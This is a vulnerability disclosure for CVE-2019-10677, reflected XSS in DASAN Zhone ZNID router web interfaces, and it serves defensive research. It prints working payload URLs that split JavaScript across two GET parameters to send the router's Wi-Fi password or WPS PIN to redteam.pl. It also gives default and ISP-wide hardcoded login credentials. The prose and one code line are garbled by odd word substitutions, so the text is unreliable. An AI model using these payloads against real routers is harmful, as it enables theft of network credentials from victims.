With fresh software update of DASAN Zhone Solutions (DZS) routers, the company pushed fixes for multiple vulnerabilities I found in it [https://redteam.pl/poc/dasan-zhone-znid-gpon-2426a-eu.html, https://www.exploit-db.com/exploits/47351]. Vulnerabilities got registered under CVE-2019-10677 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10677]. Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID allows a distant attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters. This vulnerability affects all zNID(s) models moving following firmware versions: all releases of 3.0.xxx SW (on 3.0 branch), release 3.1.349 and earlier (on 3.1 branch), release 3.2.087 and earlier (on 3.2 branch), release 4.1.253 and earlier (on 4.1 branch), release 5.0.019 and earlier (on 5.0 branch).
You can find a short description of this issues and proof-of-concept code below.
There is simply a limit of characters passed from the user to variables in the application, erstwhile we will pass 50*A and 50*B in susceptible GET parameters:
http://admin:admin@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&wlWscCfgMethod=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
We will get following response:
GET /wlsecrefresh.wl?wl_wsc_reg=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&wlWscCfgMethod=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB HTTP/1.1
[...]
<script language="javascript">
<!-- hide
/* ZHONE_CUSTOM_MODS start*/
var userid = 'admin';
/* ZHONE_CUSTOM_MODS end */
var syncNvram = '1';
var ssidIdx = '0';
// ZHONE_CUSTOM_MODS
var enblWireless = '1';
/* ZHONE_CUSTOM_MODS
var enblWireless = '1';
ZHONE_CUSTOM_MODS */
var radiusServerIP = '0.0.0.0';
var mode = 'psk2';
var bit = '0';
var keyIdx = '1';
var keys = fresh Array( "zhone55556666", "zhone55556666",
"zhone55556666", "zhone55556666" );
var wpaPskKey = 'WIFI_P@SSW0RD';
var wpaGTKRekey = '3600';
var radiusPort = '1812';
var radiusKey = '';
var wep = 'disabled';
var wpa = 'aes';
var auth = '0';
var wlCorerev = '30';
var wlRefresh = '0';
var varPreauth = '0';
var varNetReauth = '36000';
var WscDevPin = '31337';
var WscStaPin = '';
var WscMode = 'disabled';
var WscIRMode = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
var WscAPMode = '1';
var sessionKey='0123456789';
var WscCfgMethod = 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB';
var WscVer2 = 'enabled';
var WscIsForceWpsDisable = '0';
var phy = 'n';
var nmode = 'auto';
var wlWapiAvail = '0';
var preAuthMode;
var applyRequired = 0;
[...]
Both variables WscIRMode and WscCfgMethod are limited to 32 characters. It is not adequate to put XSS payload in 32 characters to bargain a variable data specified as Wi-Fi password, but utilizing both of this variables we can do it as follows:
http://admin:admin@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//
It splits our payload to 2 separated parts:
1. ';document.location=/* = 22 characters (or just ';location=/* =13 characters)
2. */'//redteam.pl/'%2BwpaPskKey;// = 32 characters (please besides keep in head that a real attacker can have shorter domain, just single letter like a.pl etc)
Using this payload susceptible application returns:
GET /wlsecrefresh.wl?wl_wsc_reg=%27;document.location=/*&wlWscCfgMethod=*/%27//redteam.pl/%27%2BwpaPskKey;// HTTP/1.1
[...]
var WscIRMode = '';document.location=/*';
var WscAPMode = '1';
var sessionKey='0123456789';
var WscCfgMethod = '*/'//redteam.pl/'+wpaPskKey;//ma';
[...]
Part marked as grey is not in usage due to the fact that this is now comment, as this part is pure JavaScript code.
Once victims visited the URL, will be redirected to REDTEAM.PL website with their Wi-FI plaintext password included, which is stored in wpaPskKey variable.
GET /WIFI_P@SSW0RD HTTP/1.1
Host: redteam.pl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;document.location=/*&wlWscCfgMethod=*/%27//redteam.pl/%27%2BwpaPskKey;//
Connection: close
Now just searching for HTTP header Referer we can find Wi-Fi password in httpd logs.
This attack can be merged with for example DNS rebinding attack as an IP address of the router most likely will be same.
Big Polish ISP Multimedia is utilizing hardcoded credentials for all routers:
http://user:Multimedia@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//
There are besides another possible attack scenarios, for example for leaking WPS PIN number:
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BWscDevPin;//
